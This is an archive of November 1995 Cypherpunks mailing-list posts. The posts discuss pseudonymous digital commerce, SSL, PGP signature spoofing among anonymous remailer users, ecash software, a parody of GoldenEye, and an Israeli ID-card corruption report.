But, of course, contracts have to be enforced in courts, which opens the whole thing to state intervention a la the unenforceability of gambling contracts etc, and, generally requires the nym to front up with some form of True Name to launch or defend proceedings... On the other hand, ADR is hot, and arbitration has long been encouraged as a method of settling commercial disputes without troubling the courts. It seems to be getting easier to enforce arbitral awards and harder to appeal them, or to bypass the arbitration in the first place. And it is becoming easier to specify your own arbitration procedures (for instance, those suited to pseudonymous parties presenting argument and evidence untraceably via the net) and even to specify the substantive law of the arbitration, which need not be the law of any state (eg the UNCITRAL contract law, or even "those laws accepted in international commerce"). So it would be possible for arbitral tribunals specially adapted to pseudonymous digital commerce to somewhat shield transactions from the procedural and substantive laws of any state that makes enforcement of those transactions problematic. Now, as Prof Post points out, the limited liability corporation is an efficient device for the pooling of capital and the taking of business risks. But the grant of incorporation is by the State, and the State usually requires certain information - such as the name and address of the stockholders - as a condition of that grant. The last time State granted incorporations were in short supply, the merchants of Britain developed (or redeveloped) the deed-of-settlement company - essentially a partnership with a Board of managing partners, the assets of the partnership vested in trustees, and the shares in the partnership easily transferrable. There were two major drawbacks to the deed of settlement company (which didn't stop them being very popular, or their shares being widely traded): 1. 
Under the procedural laws of the day it was very difficult to sue or be sued, because all of the partners (ie shareholders) at the time the cause of action arose had to be named in the action. This was ameliorated by the use of arbitration, and, occasionally, courts allowed the trustees to sue for the company. 2. Lack of limited liability - a partner is personally liable for all the debts of the partnership. This was ameliorated by providing in contracts entered into by the company that recourse could only be had to partnership assets - and, of course, by the difficulty of suing such companies. Both these can, at least partially, be overcome in pseudonymous digital commerce - the first by the use of arbitration, and by more flexible modern procedural rules (although, depending on the jurisdiction, this may not be a complete answer); the second by the inherent limited liability of an untraceable digital pseudonym. Now, with a corporation in a tax haven jurisdiction acting as trustee (to more than one company, potentially), someone/something acting as a registry (attending to the transfer of shares in the company, and potentially many other companies), an account at Mark Twain (held by the trustee company), and an appropriate deed of settlement (or partnership agreement) - oh, and some object for the company - and now you've got something to do with your digicash! ;-) As an historical aside, the reason unincorporated companies died out in Britain was that they were outlawed when the general incorporation acts were introduced - or, rather, existing companies were encouraged to incorporate (where their deeds became their articles of association, and the objects of the trust became the memorandum of association) and new ones were outlawed as oversize (somewhere between 10 and 25, at various times) partnerships. 
In England and Australia, at least, the prohibition on outsize partnerships still continues, and special exceptions have to be made for Chartered Accountants, Solicitors and architects. Unincorporated companies were not so popular in the US (although Alexander Hamilton (?) originally organized the Bank of New York as one) because, after the revolution, general incorporation statutes were quick to be passed. (Which, incidentally, is why the Commonwealth has companies and shares and articles, and the US has corporations and constitutions and stocks. [Canada is the exception that proves the influence of geography over history.]) On the other hand, the Massachusetts (?) Business Trust can be seen as the ultimate development of the concept (or, at least, that's what I read somewhere). Dm. [Palmtop News Reader - Beta Version 3] From dlv at bwalk.dm.com Sat Nov 18 18:34:15 1995 From: dlv at bwalk.dm.com (Dr. Dimitri Vulis) Date: Sun, 19 Nov 1995 10:34:15 +0800 Subject: Anderson on SSL Message-ID: One of the mags I get for free is called _OEM_. It recently ran an interview with Marc Anderssen from Netscape. I'll key in a few crypto-relevant passages. ... Q. Everyone's looking for ways to make money on the World Wide Web. What is the future for advertisers on the Web? A. Advertisements in an interactive medium definitely function best as a service; really, the line between advertising, informational marketing and direct sales blurs incredibly quickly. I expect a lot of creativity to be devoted to pulling people into commercial sites and keeping them there, including continuing sponsorship of innovative content. Q. 
Do you see many small transactions as a possible model for making money on the Web? A. Tiny transactions will be a part of the grand scheme of things. They'll make possible the 2-cent joke of the day and lots of appropriate forms of content. Q. How will people deal with getting costs down for each transaction to eke out a profit? A. That's the challenge for the companies that intend to make money processing tiny transactions. I can't wait to see who does it first. Q. Now that the InterNIC has started to charge for domain names, do you, as an Internaut, miss the anarchistic, "anything goes" community the Net once was? A. The Internet was never really anarchistic and "anything goes". It was always a cooperative venture that everyone derived benefit from. That's pretty much the case. In fact, I still get a thrill -- more now than ever -- when I go through directories like Yahoo. There's much more out there on the Net now. Everything is accelerating. ... Q. Do you think that the Netscape's Secure Sockets Layer (SSL) is the de facto standard for Internet security now? A. SSL is a de facto standard, widely adopted throughout the industry by Microsoft, Novell, Apple, IBM, Sun, Digital Equipment, Intel, MasterCard, Visa, etc. The security space is a very broad space, though, and SSL solves a specifically defined set of problems: encryption and authentication for a secure data channel over TCP/IP. There are many other problems yet to solve. Other protocols will play a role in solving those problems, and we will support them. Q. What happened to the deal with Enterprise Integration Technologies and its Secure Hypertext Protocol (S-HTTP), which was Netscape's only real competition in the area of secure server software? A. Early this year, we announced that Netscape (along with IBM/Prodigy, America Online and Compuserve) became an investor and partner in Terisa Systems, which was previously a joint venture of EIT and RSA Data Security. 
All Parties agreed to support both SSL and S-HTTP. Unfortunately, Terisa has been unable to ship its toolkit, so things haven't gone as well as we had all hoped. In the meantime, virtually everyone is supporting SSL [but not S-HTTP]. Q. Do you think that your server software, and especially your protocol Secure Courier, will lessen the public perception that credit-card entries aren't safe on the Net? A. I think it's happening. We're in the middle of a broad shift in consumer behavior, and there will be a lot of exciting things happening over the next few years as a result. Things are definitely warming up right now. Of course, one of the great things about doing business on the Net is that it's a lot cheaper for the merchant than doing business in the "real" world. One of the broad trends we're starting to see is that a lot of entrepreneurial companies will be coming up on the Net. They, more than anyone, will help drive the shift in consumer behavior by offering innovative goods and services and innovative ways. ... --- Dr. Dimitri Vulis Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From rah at shipwright.com Sat Nov 18 19:29:05 1995 From: rah at shipwright.com (Robert Hettinga) Date: Sun, 19 Nov 1995 11:29:05 +0800 Subject: Anonymity and Intellectual Capital Message-ID: >I suggest that arbitration is well suited to >pseudonymous commerce, and propose the use of an old device - the >unincorporated, or deed of settlement, company. First of all, this is a damn fine post. Outstanding! The first thing that strikes me about all this is how time seems to be "unwinding" as far as centralization of power, or anything else, is concerned. 
I've ranted about all this here and elsewhere, how falling semiconductor prices, public networks and strong cryptography beget the reemergence of bearer certificates, this time in digital form (of which ecash is only the prima facie example, the existence proof) and what I call, for lack of a better term, a "geodesic", instead of hierarchical, economy. We're seeing in this "unincorporated company" idea the devolution, the surfacting, of concentrations of information, and thus power, back out to individuals, and with that, responsibility, and of course, freedom. Truly marvelous. Hope there's more where that one came from. Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971 "Reality is not optional." --Thomas Sowell The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From sameer at c2.org Sat Nov 18 19:58:33 1995 From: sameer at c2.org (sameer) Date: Sun, 19 Nov 1995 11:58:33 +0800 Subject: e$: Come aaaannnndddd Get it! In-Reply-To: Message-ID: <199511170520.VAA28087@infinity.c2.org> > > 3. The success of BankAmericard (later renamed Visa) came when real > customers and real shops started to use it, not when early pioneers set > themselves up as clearinghouses and whatnot. I'm sorry, but Community ConneXion is a real shop, with real customers, selling real services, and we accept ecash. 
-- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 The Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org/ (or login as "guest") sameer at c2.org From s1113645 at tesla.cc.uottawa.ca Sat Nov 18 20:06:51 1995 From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca) Date: Sun, 19 Nov 1995 12:06:51 +0800 Subject: Anonymity and Intellectual Capital In-Reply-To: Message-ID: On Sat, 18 Nov 1995, David Murray wrote: > To pick up on a couple of Professor Post's ideas - limited liability of > untraceable pseudonyms, and choice of rule sets in cyberspace (see Post, > "Anarchy, State, and the Internet: An Essay on Law-Making in Cyberspace" > 1995 J Online Law art 3), I suggest that arbitration is well suited to Great! Where? (damn I should keep my older posts for a bit longer) > pseudonymous commerce, and propose the use of an old device - the > unincorporated, or deed of settlement, company. Interesting. I just read that Liechtenstein allows anonymous corporations (as in you register for it anonymously). I'm curious to know how this works (if I've got it right). It might also become rather interesting when one enterprising tax haven permits registration for these things online (and hopefully automatically, for the proper anon fee). Barring escrow services, I don't see how contracts (or a lot of other laws) could be enforced against these entities when they can simply pop in and out of existence (unless they have some physical counterpart, like a storefront and merchandise. But then these are easily linkable to True Names, unlike software companies, financial services or any other part of the info economy.) The value of a reputation is not particularly high in lots of cases or is occasionally worth throwing over for a big one-time scam. (Pyramid scams for "reputable" banks) While I'd love to set one up, I would never do any risky commerce with one. 
Besides, if companies in general can set up other companies, in a trustworthy and non-anon jurisdiction, couldn't these foreign anon companies do the same in the present system and therefore make it very hard to know if any company in any country is non-anon? Are there any present legal barriers against this? I don't know much about the requirements of incorporation or the natures of various types of corporations, so please feel free to correct me. I'm not completely sure I understood your explanation of a deed-of-settlement corp. and the idea of an "unincorporated" company. (Unincorporated in what way, and what were the registration and ID requirements?) Any references? Thanks. Ps. I know I could probably look this up, but exactly what are bearer bonds? I frequently hear them mentioned when market anonymity and money laundering come up. From nowhere at bsu-cs.bsu.edu Sat Nov 18 20:20:59 1995 From: nowhere at bsu-cs.bsu.edu (Anonymous) Date: Sun, 19 Nov 1995 12:20:59 +0800 Subject: .Sig Heilarchy Message-ID: <199511190403.XAA28059@bsu-cs.bsu.edu> .SIG HEILARCHY REVEALED >Logically, a pseudonym is simply a public key. However you may want >to give it a human-readable name so other people may more easily refer >to it. If you decide to do this, I suggest that you do not name the key >on its first post because there is a high probability that you will decide >to discard the key. If you name it and throw it away, then you have >unnecessarily cluttered up the limited name space. > > - a new entity, as yet unnamed "Cluttering up the namespace" is a growing problem. Fortunately, the InterNIC has taken on the important task of registering pseudonyms, and will coordinate the issuance of new pseudonyms with the Postal Service. [The issuance of these items is temporarily on hold due to the Government Shutdown (tm).] The fee for this will likely be quite reasonable, in the $300/year range, consistent with SAIC's plans for other emerging markets. 
The InterNIC also sees great promise in collecting fees for .sig blocks, tentatively priced at $10 per line per year. As SAIC Chairman Bobby Ray Inman points out, this is the easiest way to control the proliferation of long .sig blocks. --Klaus! von Future Prime, a Sanctioned Pseudonym [.sig removed by order of the InterNIC .Sig Heilarchy until Herr von Future Prime sends us his past due amount] From raph at c2.org Sat Nov 18 20:37:53 1995 From: raph at c2.org (Raph Levien) Date: Sun, 19 Nov 1995 12:37:53 +0800 Subject: Design proposal: crypto-capable generic interface In-Reply-To: Message-ID: <199511190419.UAA15156@infinity.c2.org> s1113645 at tesla.cc.uottawa.ca wrote: > MOSS? MIME Object Security Services. It's a technically superior alternative to PGP, but one with an uncertain future. It's not being actively developed by anyone other than TIS, and their TISMOSS prototype implementation is far from being generally usable. For more information on the standard, see RFC 1848: http://ds.internic.net/rfc/rfc1848.txt For more information on the TIS effort, see: http://www.tis.com/docs/Research/moss.html Raph From anonymous-remailer at shell.portal.com Sat Nov 18 20:52:55 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Sun, 19 Nov 1995 12:52:55 +0800 Subject: (CANADIAN PRESS REPORTS) Message-ID: <199511190440.UAA01341@jobe.shell.portal.com> On Sat, 18 Nov 1995, jim bell wrote: > >anonymous writes: > >> I still feel such a sense of violation with what LD did, such an > >> utter sense of helplessness at the character assassination I've > >> suffered at his hands, > > > >So use PGP, sign your messages. Simple solution. > > Absolutely! Anybody who uses anonymous remailers to post to public areas, > and does not use digital signatures to prevent spoofing when it is obviously > needed, is a fool or worse. 
Most people believe THAT a digital signature is evidence that I am who my signature _says_ I am when it really doesn't do that at all. It isn't reliable at all. Unfortunately, I've learned the hard way NOT to do that. Digital signatures don't prevent spoofing. In fact, I think that thinking something is secure when it isn't leads to even more trouble, and could even lead to many tragedies. In a nutshell, here's the problem. If someone takes my pgp secret keyring and my password, then they can sign a message *digitally* so that people believe the spoofed message is really from me. In fact, since most people tend to rely on a pgp message far more than a non-pgp message, most people would be absolutely convinced that the message was in fact from me. Signing with PGP is just not a solution. Alice de 'nonymous ... ...just another one of those... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. From black at eng.usf.edu Sat Nov 18 21:15:27 1995 From: black at eng.usf.edu (James Black) Date: Sun, 19 Nov 1995 13:15:27 +0800 Subject: (CANADIAN PRESS REPORTS) In-Reply-To: <199511190440.UAA01341@jobe.shell.portal.com> Message-ID: Hello, On Sat, 18 Nov 1995 anonymous-remailer at shell.portal.com wrote: > On Sat, 18 Nov 1995, jim bell wrote: > > Most people believe THAT a digital signature is evidence that I am who my > signature _says_ I am when it really doesn't do that at all. It isn't > reliable at all. > > Unfortunately, I've learned the hard way NOT to do that. Digital > signatures don't prevent spoofing. > > In fact, I think that thinking something is secure when it isn't leads > to even more trouble, and could even lead to many tragedies. > > In a nutshell, here's the problem. > > If someone takes my pgp secret keyring and my password, then they can > sign a message *digitally* so that people believe the spoofed message is > really from me. 
In fact, since most people tend to rely on a pgp message > far more than a non-pgp message, most people would be absolutely > convinced that the message was in fact from me. > > Signing with PGP is just not a solution. I am planning on changing pine (a mail program on the Unix) to use PGP and RIPEM directly, and this is one of the issues I am dealing with. The fact is that if you let someone get your secret keyring and password then that is your problem, as both should be secure, esp your password. What I am hoping to do is just have every message that is to be signed to be signed with the thumbprint (hash?) of the message, and this will be put at the bottom of each message, every time, so that it protects from any messages being changed, and verifies who sent the message. Again we go back to the fact that the weakest link here is *you* not PGP. Take care and have fun. BTW: Once I am done this version of Pine will be export controlled it sounds like. :( James Black black at suntan.eng.usf.edu From stewarts at ix.netcom.com Sat Nov 18 22:19:30 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Sun, 19 Nov 1995 14:19:30 +0800 Subject: negative reputation (was: WRITTEN CODE) Message-ID: <199511190558.VAA11128@ix6.ix.netcom.com> At 07:53 PM 11/18/95 -0500, a new entity, as yet unnamed wrote: >Logically, a pseudonym is simply a public key. However you may want >to give it a human-readable name so other people may more easily refer >to it. If you decide to do this, I suggest that you do not name the key >on its first post because there is a high probability that you will decide >to discard the key. If you name it and throw it away, then you have >unnecessarily cluttered up the limited name space. > > - a new entity, as yet unnamed Here's the new entity's key, signed :-) I haven't added it to the PGP key servers; I'll leave that up to you...
#-- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281 From anonymous-remailer at shell.portal.com Sat Nov 18 22:22:37 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Sun, 19 Nov 1995 14:22:37 +0800 Subject: CANADIAN PRESS REPORTS (was Re: CSE gets flak on TV) Message-ID: <199511190612.WAA15057@jobe.shell.portal.com> Alice here (the real one) ... On Sat, 18 Nov 1995, Perry E. Metzger wrote: > I hope everyone realizes that Detweiler is probably arguing with > himself, three levels deep. I must admit that the levels he stoops to > in order to draw attention to himself are pathetic. Why don't you just > stick to posting as Vlad Nurzi? It's more dignified. Deitweiler certainly is getting around ... but I'm beginning to have my doubts whether it is Deitweiler who is spoofing me. And Deitweiler might be Vlad Nurzi or whoever, but it seems that whoever is spoofing me -- whether it is Detweiler or not -- is privy to certain "facts" ... verifiable facts ... some of which are very worrisome. And it's not just whatever news is breaking over the wire. anonymous-remailer at shell.portal.com writes: > > > > Here is the TRUE unedited story for the list which Deitweiler felt he > > had to TWIST to the nth degree. His attempt at making mountains out > > of mole hills will not succeed with this one. > > This story truly is a non-starter. Big deal. 
It really has no > relevance to this international list. This is simply a Canadian matter. I take this last comment back. It was premature. I think that this is in fact very relevant to this list. And it's not just a Canadian matter. My little spoofing-shadow, Mr. Mystery-Writer, seems to not only have a juvenile sense of humour, but seems to have a handle on some pretty sensitive information. His information isn't limited to how Canada was able to outbid the United States on a wheat deal with China, but his information encompasses matters of an order of greater significance, especially when Mr. Mystery-Writer wrote: > And that's the fleshed out version of the story. > > I'm just sorry that our Prime Minister is in such a bad position because > of the timing of this "Jane Shorten's" revelations. She also revealed > that Canada spied on Japan. > > To think ... Canadian Prime Minister Chretien is a guest of the Japanese > people today. Talk about some awkward moments. I mean, what on earth do > you talk about?? > > George Bush and Sushi?? Whoever it was who wrote this, they took a real swipe at a former President of the United States. This is very, very serious. Joking about Japanese / American relations is very black humour and is one thing, but taking an open swipe at a former American President is grossly inappropriate and was completely another, I thought. But, ironically, Mr. Mystery-Writer had incredible foreshadowing skills. > Let's see ... over the last couple of days, we've had one provincial > Premier resign over "BingoGate" -- kickbacks from bingo games, another > premier is under some pretty heavy fire for some insider trading in a > company he promoted in Hong Kong, (actually his wife got stock she never > had to pay for), while Canada in conjunction with the normally very > neutral Swiss have frozen accounts pertaining to about $20 million or so > in kickbacks from Airbus Industries to a "senior Canadian politician". > > And all these stories ... 
coincidentally ... broke back to back. This to me was the kicker ... especially in light of news which just broke tonight. Mr. Mystery-Writer was trying to throw a clue. And boy, what a clue it was. It wasn't the former President of the United States that he was speaking of ... it was the former Prime Minister of Canada. It was reported today that former Canadian Prime Minister Brian Mulroney has launched a $50 Million pre-emptive lawsuit against the Royal Canadian Mounted Police and the Canadian Department of Justice for their possible future allegation or possible future charge of taking kickbacks from Airbus Industries while the former Prime Minister held public office. This is one heck of a newsflash ... especially considering the co-operation of the normally secretive and discreet authorities in Switzerland. Can you imagine if former President George Bush had in fact launched a $50 Million pre-emptive lawsuit against the Federal Bureau of Investigation and the Department of Justice, because they were investigating him for something?? Or if George Bush tried to stop a news story through libel chill? My shadow was right (even if he did announce before the wires, did), Canadian politicians are beginning to drop like flies. Let the "Jane Shorten" Film-Fest begin. Can you pass the popcorn? Alice de 'nonymous ... ...just another one of those... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. From Cybie at cris.com Sat Nov 18 22:50:09 1995 From: Cybie at cris.com (Greg Morgan) Date: Sun, 19 Nov 1995 14:50:09 +0800 Subject: VB4 secure mail software Message-ID: <199511190630.BAA13412@deathstar.cris.com> To the guy who was interested in writing a secure mail program that worked with MS Exchange in VB4, e-mail me... I was also thinking of working on something like that, we could probably work together on this. 
From jimbell at pacifier.com Sat Nov 18 22:55:42 1995 From: jimbell at pacifier.com (jim bell) Date: Sun, 19 Nov 1995 14:55:42 +0800 Subject: (CANADIAN PRESS REPORTS) Message-ID: Detweiler wrote... >On Sat, 18 Nov 1995, jim bell wrote: > >> >anonymous writes: >> >> I still feel such a sense of violation with what LD did, such an >> >> utter sense of helplessness at the character assassination I've >> >> suffered at his hands, >> > >> >So use PGP, sign your messages. Simple solution. >> >> Absolutely! Anybody who uses anonymous remailers to post to public areas, >> and does not use digital signatures to prevent spoofing when it is obviously >> needed, is a fool or worse. > >Most people believe THAT a digital signature is evidence that I am who my >signature _says_ I am when it really doesn't do that at all. It isn't >reliable at all. > >Unfortunately, I've learned the hard way NOT to do that. Digital >signatures don't prevent spoofing. > >In fact, I think that thinking something is secure when it isn't leads >to even more trouble, and could even lead to many tragedies. > >In a nutshell, here's the problem. > WARNING! WARNING! WARNING! BIG "IF" COMING UP! BIG "IF" COMING UP!!! >If someone takes my pgp secret keyring and my password, then they can ^^ >sign a message *digitally* so that people believe the spoofed message is >really from me. In fact, since most people tend to rely on a pgp message >far more than a non-pgp message, most people would be absolutely >convinced that the message was in fact from me. Pardon me, but what was the point of that last comment? It is an obvious statement of fact that yes, IF IF IF somebody had a secret key AND password, he could duplicate a signature. Digital signatures allow a person to exclude others from being able to sign messages as if they are from him. 
True, a person could simply publish his secret key and password, at which point everyone could sign notes as if they came from him, but that wouldn't be "interesting" because most people would have no reason to do so. >Signing with PGP is just not a solution. It is, apparently, in the vast majority of possible situations. Why would you even try to disagree? Oh, yes, I forgot... you're Detweiler. From don at wero.byu.edu Sun Nov 19 01:23:13 1995 From: don at wero.byu.edu (Don M. Kitchen) Date: Sun, 19 Nov 1995 17:23:13 +0800 Subject: [NOISE] REWRITE! : GoldenEye In-Reply-To: <199511180406.XAA18908@bb.hks.net> Message-ID: > Just got back from the new Pierce-Brosnan-as-007 flick. > It had a few typical "hacker" stereotypes, and a couple > of interesting crypto relevant references. Here's the cypherpunk rewrite of the movie... > * Boris, the stereotypical hacker, was hacking through American > banks. A screen had the words "Department of Justice" and the > DoJ logo; underneath were the words "Clipper Chip" and a list > of banks. ...bought the clipper codes from some guy at the DOJ for $100. (gets a discount rate - normal rate is $200) > * The archvillian's plan involved a massive money transfer and > an EMP pulse; he very briefly explained the effects of what > would happen if every computer in London were rendered non- > functional. Possible crypto-anarchy bits. No need. All the banks are using DES, which has suddenly become strong again. (only for another 10 years, of course) > * Boris should learn the value of strong passphrases. His > password for the massive mainframe which will be used in the > archvillain's scheme is a five-letter dictionary word, which > didn't change (and it was used on two different computers), > and he revealed it indirectly (it was a word puzzle). ..hacked the account from some guy in Microsloth network security, who doesn't know yet that anyone else is using it. > * A few on-computer-screen references to "encryption". 
> > * Boris and the mastermind kept bantering about "breaking codes." It really is annoying to try to break 40bit keys realtime. Why couldn't they have been only 32 bits or something... > * Boris' computer in Russia - in his apartment - has a domain > ending in ".comp.math.edu"; when his screen lights up with > the words "INCOMING EMAIL" he goes into a live chat (complete > with graphics). Using Weidei's TCP tunneler to submarine his computer so that it _REALLY_IS_ under that domain. (After all, someone would probably suspect kgb.com or UofHack.edu.ussr domains) Re chat with graphics: isn't X great?! Have to remember to hack into a T3 though, this lag is really slowing the feed down... Makes the movie longer, ya know. Plus, techies will get a thrill if movie shows doom being played remotely. There you have it. Suitable for any cryptoanarchists' night out. Don PS: Anyone know about ML, the IMAP mail program? Just installed the new version at home and noticed I haven't seen the PGP hooks in the configuration like I did on earlier versions. Hmmmmmmmmmmmmmmmmmmm From anonymous-remailer at shell.portal.com Sun Nov 19 02:31:58 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Sun, 19 Nov 1995 18:31:58 +0800 Subject: reputations: discussions and meta-discussions Message-ID: <199511191017.CAA27805@jobe.shell.portal.com> -----BEGIN PGP SIGNED MESSAGE----- On Sat, 18 Nov 1995, Bill Stewart wrote: > Here's the new entity's key, signed :-) I haven't added it to the > PGP key servers; I'll leave that up to you... As we know, a public key certificate is a binding between the key and some attribute, as asserted by the signer. In this case you have asserted a binding between my key and the string "a new entity, as yet unnamed". I don't understand why you did this. Would you please explain? The only reason I can think of is that you wanted to provide evidence for the key's creation date by timestamping it. 
If that was the case, I thank you. But in the future, to avoid confusion, perhaps you can create a new ID "timestamp" for the key and sign that instead. ------------- On a different subject, given the likelihood of an increasing number of new identities showing up on this list, I propose that we create a new mailing list (cypherpunks-reputations) devoted to the discussion of reputations of cypherpunks participants. A significant number of posts on cypherpunks are already discussions of this sort. I believe it would be beneficial to create a separate channel for these meta-discussions so they do not interfere with regular cypherpunk topics. By encouraging discussions about reputations of specific entities, we may also gain some insight on the general properties of reputation systems. In this sense by creating this new list we create an interesting self-referential loop -- cypherpunks-reputations contains meta-discussions about cypherpunks, which in turn contains meta-discussions about cypherpunks-reputations. Examples of posts appropriate for this new mailing list would include: * knowledge, intelligence, style and quirks of cypherpunks participants * exchange of keys and certificates * speculation on connections between entities * kill file entry recommendations I do not have the physical resources to serve such a mailing list, so I hope someone who does will volunteer. - keyid D072FC19 (still unnamed) -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMK8CnY2Fr67QcvwZAQGUJgP9G8ER/qH8OKvSbOtPYwaDQMkVyKFWafxH Ukbm0lKgCwS97cEKufxJH49VCRkxrd+t+ia5IRNDxewB1xlcjAKRvp4MK8Ps6MTy FbhmEpfhB4pnfE5l+e8VnZSoD79j0Sv6C80C48NL6NJNV6PhhTS9B5lXxW/qJv9D 3ZTpTf5AjZI= =e4DU -----END PGP SIGNATURE----- From sameer at c2.org Sun Nov 19 03:33:24 1995 From: sameer at c2.org (sameer) Date: Sun, 19 Nov 1995 19:33:24 +0800 Subject: ecash as pgp Message-ID: <199511191118.DAA14424@infinity.c2.org> This is really frustrating. 
I'm trying to figure out how to use this damn ecash software to setup a prototype ecash-accepting remailer. For one thing, there's no documentation. Secondly, from what I can tell, it's like PGP. To integrate it into other software you have to do all sorts of nasty output parsing. why the hell can't it just produce nice, terse, informative, UNIX-like output? it's late, i'm tired, I'm going to sleep. (the party was fun, btw, thanks to everyone who showed up.) -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 The Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org/ (or login as "guest") sameer at c2.org From bdolan at use.usit.net Sun Nov 19 05:54:46 1995 From: bdolan at use.usit.net (Brad Dolan) Date: Sun, 19 Nov 1995 21:54:46 +0800 Subject: Real-life example of why National ID cards won't work Message-ID: ---------- Forwarded message ---------- #Date: Fri, 17 Nov 95 16:18:55 PST #From: medic at netvision.net.il #To: shomronnews at felix.dircon.co.uk #Subject: Update 755 SNS News Service "Interior Ministry Scandal" November 19, 1995..26 Cheshvan 5756..Number 755..Update from Israel ... Following a report released by Yediot Achronot Newspaper, Interior Minister (Labor) Ehud Barak has ordered an immediate investigation into allegations of wrong-doing by senior Ministry officials. The report states that falsified ID cards and other Ministry permits are being sold to Arabs. Among those mentioned in the newspaper story is Chaim Ben-Atar, the Director of the Ministry's East Jerusalem Office, a Member of Knesset, and past members of the Mossad and GSS (Shin Bet). The Yediot report also alleges that Police officials silenced investigations over the past two years (that may have prevented terrorist attacks) for the fear of revealing names of top officials involved in the Ministry false documentation scam. 
The investigations involved senior officers in the IDF Civil Administration, IDF officers, senior Ministry of the Interior officials and officials in the Jerusalem Municipality. Some of the allegations: 1) In the East Jerusalem Branch of the Ministry of the Interior, Arabs that are not entitled by law may still receive ID cards, travel permits to Jordan, and other official documentation in return for cash payments or "favors". 2) Senior officials in the security service of the State have abused their connections with the east and west Jerusalem Ministry Offices, and have offered permits to travel abroad in return for cash payments. The permits were given to Arabs that would not be able to obtain them legally. 3) Interior Ministry workers have received favors and cash payments from Arab and Jewish agents in return for issuing travel documents, ID cards and passports. 4) Chaim Ben-Atar, the Director of the East Jerusalem Interior Ministry Registration Office has provided five Arab residents of Gaza with ID cards stating they live in East Jerusalem. 5) Ben-Atar also employed an Arab woman during a four-year period whose brother is a "religious fanatic activist in East Jerusalem". The Arab woman who assisted Ben-Atar has access to highly classified information. She was released from her position one year ago for "personal reasons." 6) During an investigation into wrong-doing by the past head of the Allenby Bridge crossing, information pointing to wrong-doing by other senior IDF officers and Jerusalem Municipality workers was uncovered as well. The Ministry chose not to pursue the investigation against them. The cases against them were silenced by Interior Ministry officials. (Yediot Achronot ..11/19..Page 5). ... From jamesd at echeque.com Sun Nov 19 07:17:59 1995 From: jamesd at echeque.com (James A. Donald) Date: Sun, 19 Nov 1995 23:17:59 +0800 Subject: Recompiling PGP 2.6.2i under microsoft. 
Message-ID: <199511191508.HAA19053@blob.best.net> I am trying to recompile PGP 2.6.2i under Microsoft's VC 1.5. Unfortunately the makefile pgp.mak is configured for Borland's C compiler and linker, and the makefile pgppwb.mak gives me a bunch of link time errors. Is there someone around who has been there and done that? Is this just a trivial edit or a serious rewrite? C:\PGP\PGP.SRC\SRC> nmake -f pgppwb.mak [....] Libraries [.lib]: Definitions File [nul.def]: /NOI /STACK:12288 /BATCH /ONERROR:NOEXE /EXE /FAR / PACKC; RSAGEN.obj(rsagen.c) : error L2029: '_rsa_public_decrypt' : unresolved external CRYPTO.obj(crypto.c) : error L2029: '_rsa_public_decrypt' : unresolved external RANDOM.obj(random.c) : error L2029: '_randPoolGetByte' : unresolved external RANDOM.obj(random.c) : error L2029: '_randPoolStir' : unresolved external CRYPTO.obj(crypto.c) : error L2029: '_rsa_public_encrypt' : unresolved external IDEA.obj(idea.c) : error L2029: '_randPoolGetBytes' : unresolved external RANDOM.obj(random.c) : error L2029: '_randPoolAddBytes' : unresolved external RSAGEN.obj(rsagen.c) : error L2029: '_rsa_private_encrypt' : unresolved external CRYPTO.obj(crypto.c) : error L2029: '_rsa_private_encrypt' : unresolved external RANDOM.obj(random.c) : error L2029: '_sleep' : unresolved external RANDOM.obj(random.c) : error L2029: '_noise' : unresolved external PGP.obj(pgp.c) : error L2029: '_noise' : unresolved external CRYPTO.obj(crypto.c) : error L2029: '_rsa_private_decrypt' : unresolved external NMAKE : fatal error U1077: 'LINK' : return code '0x2' Stop. --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we are. True law derives from this right, not from the arbitrary power of the omnipotent state. http://www.jim.com/jamesd/ James A. 
Donald jamesd at echeque.com From BELL at odo.law.udayton.edu Sun Nov 19 08:57:00 1995 From: BELL at odo.law.udayton.edu (Tom Bell) Date: Mon, 20 Nov 1995 00:57:00 +0800 Subject: Anonymity and Intellectual Capital Message-ID: > I've ranted about all this here and elsewhere, how falling semiconductor > prices, public networks and strong cryptography beget the reemergence of > bearer certificates, this time in digital form (of which ecash is only the > prima facie example, the existence proof) and what I call, for lack of a > better term, a "geodesic", instead of hierarchical, economy. > Bob Hettinga Agreed. What's more, I'll make a similar claim about the legal system -- with the rise of alternate dispute resolution systems, it too appears to be moving toward a system where law issues less from state authorities and more from private ones. Post's article brings out this point well. As for terminology, I prefer "polycentric." Originally coined (I believe) by Polyani with regard to non-hierarchical societies, it works quite well in economic and legal contexts. A polycentric system harbors overlapping authorities in free and open competition. Tom W. 
